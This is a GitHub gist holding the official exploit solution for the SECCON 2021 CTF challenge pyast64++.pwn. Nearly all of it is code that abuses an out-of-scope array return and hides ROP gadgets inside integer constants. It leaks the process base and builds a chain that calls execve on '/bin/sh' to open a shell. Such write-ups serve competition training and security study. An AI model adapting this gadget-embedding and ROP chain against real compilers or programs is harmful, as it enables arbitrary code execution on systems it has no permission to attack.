Last active
December 12, 2021 09:47
-
-
Save ptr-yudai/609a84a7c44eb468cdf49a426bb723f2 to your computer and use it in GitHub Desktop.
Official solution for pyast64++.pwn from SECCON 2021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def get_overlap(): | |
# [vuln] Return a local array out-of-scope | |
return array(0x100) | |
def f1(evil): | |
# Create padding for ROP chain | |
x = array(0xe0) | |
f2(evil) | |
def gadgets(): | |
0x00c3d231 # xor edx, edx; ret; | |
0x00c3f631 # xor esi, esi; ret; | |
0x00c35f50 # push rax; pop rdi; ret; | |
0x00c3c031 # xor eax, eax; ret; | |
0x00c33bb0 # mov al, 59; ret; | |
0x00c3050f # syscall; ret; | |
0x00c35a5a # pop rdx; pop rdx; ret | |
def f2(evil): | |
# Prepare ROP chain | |
proc_base = evil[0x1b] - 0x11d5 | |
evil[0x1b] = proc_base + 0x1212 # pop rdx; pop rdx; ret | |
# skip evil pointer and type field | |
evil[0x1e] = proc_base + 0x11fa # push rax; pop rdi; ret | |
evil[0x1f] = proc_base + 0x11ee # xor edx, edx; ret | |
evil[0x20] = proc_base + 0x11f4 # xor esi, esi; ret | |
evil[0x21] = proc_base + 0x1200 # xor eax, eax; ret | |
evil[0x22] = proc_base + 0x1206 # mov al, 59; ret | |
evil[0x23] = proc_base + 0x120c # syscall; ret | |
binsh = array(1) | |
binsh[0] = 0x0068732f * 0x10000 * 0x10000 + 0x6e69622f | |
return binsh + 8 | |
def main(): | |
evil = get_overlap() | |
f1(evil) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment